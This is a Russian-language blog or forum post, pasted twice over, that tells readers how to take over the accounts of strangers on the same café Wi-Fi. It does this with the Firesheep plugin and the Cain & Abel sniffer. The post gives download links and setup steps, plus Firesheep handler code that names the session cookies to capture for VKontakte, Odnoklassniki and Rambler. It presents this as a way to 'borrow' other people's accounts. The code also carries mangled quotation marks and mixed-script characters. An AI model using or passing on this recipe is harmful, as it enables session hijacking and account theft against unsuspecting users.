Допустим вы сидите в какой-нибудь кафешке, где есть открытый доступ вай-фай. Хочу вас обрадовать, теперь вы можете «позаимствовать» аккаунты пользователей таких популярных сетей как Вконтакте, Facebook, Odnoklassniki, Twitter да и вообще любого сайта (где нет защиты SSL/HTTPS) всех тех юзеров этого же WI-FI соединения посредством плагина для Firefox под названием Firesheep. (естественно при условии, что пользователь зайдет в свой аккаунт.) Данный плагин перехватывает cookies на пути к серверу, таким образом используя информацию о сессии вы можете войти в систему как «перехваченный» пользователь. И так что нам для этого нужно:
Скачиваем плагин здесь — http://codebutler.github.com/firesheep/
Скачиваем программу для перехвата пакетов Cain & Abel — http://www.oxid.it/downloads/ca_setup.exe
Смотрим как настроить программу здесь - http://www.youtube.com/watch?v=ubxHPhMFTvc
Запускаем Firefox, устанавливаем плагин.
Инструменты > Дополнения > FireSheep > Настройки
По умолчанию в настройках стоять все самые популярные сервисы забугорного интернета (facebook, twitter,yahoo,flickr…), однако нам надо добавить vkontakte и т.д. и т.п. Переходим по вкладке Websites -> Add -> Vkontakte.ru
Далее Edit и заменяем всё следующим кодом:
Аналогично для Odnoklassniki.ru
И Rambler:
(Таким методом можно прикрутить любой веб-сайт, если знаешь какие кукисы отвечают за авторизацию)
Теперь заходим во вкладку Вид -> Боковая Панель -> FireSheep (или же Shift+Ctrl+S) и нажимаем «Start Capturing». Через какое-то время начнуть появляться пойманные кукисы.
взято с http://freakblog.ru/
Скачиваем плагин здесь — http://codebutler.github.com/firesheep/
Скачиваем программу для перехвата пакетов Cain & Abel — http://www.oxid.it/downloads/ca_setup.exe
Смотрим как настроить программу здесь - http://www.youtube.com/watch?v=ubxHPhMFTvc
Запускаем Firefox, устанавливаем плагин.
Инструменты > Дополнения > FireSheep > Настройки
По умолчанию в настройках стоять все самые популярные сервисы забугорного интернета (facebook, twitter,yahoo,flickr…), однако нам надо добавить vkontakte и т.д. и т.п. Переходим по вкладке Websites -> Add -> Vkontakte.ru
Далее Edit и заменяем всё следующим кодом:
Код:
register({
name: «Vkontakte.ru»,
domains: [ 'vkontakte.ru' ],
sessionCookieNames: [ 'remixsid','remixchk' ],
identifyUser: function () {
var resp = this.httpGet(this.siteUrl);
this.userName = resp.body.querySelector(‘#profile_name’).innerText;
this.userAvatar = resp.body.querySelector(‘#profile_avatar img’).src;
}
});
Код:
register({
name: «Odnoklassniki.ru»,
domains: [ 'odnoklassniki.ru' ],
sessionCookieNames: [ 'JSESSIONID' ],
identifyUser: function () {
var req = this.siteUrl + «/dk?cmd=PopLayer&st.cmd=userConfig&tkn=7823&st.layer.cmd=PopLayerEditUserProfile»;
var resp = this.httpGet(req);
this.userName = resp.bоdу.querySelector(«input[name='fr.name']«).value + » » + resp.bоdу.querySelector(«input[name='fr.surname']«).value;
}
});
Код:
register({
name: «Rambler.ru»,
domains: [ 'rambler.ru' ],
sessionCookieNames: [ 'rsid' ],
identifyUser: function () {
var resp = this.httpGet(«[url]https://id.rambler.ru/sсriрt/settings.cgi?mode=settings»[/url]);
this.userName = resp.body.querySelector(«input[name='user.fname']«).value + » » + resp.body.querySelector(«input[name='user.lname']«).value;
}
});Теперь заходим во вкладку Вид -> Боковая Панель -> FireSheep (или же Shift+Ctrl+S) и нажимаем «Start Capturing». Через какое-то время начнуть появляться пойманные кукисы.
взято с http://freakblog.ru/
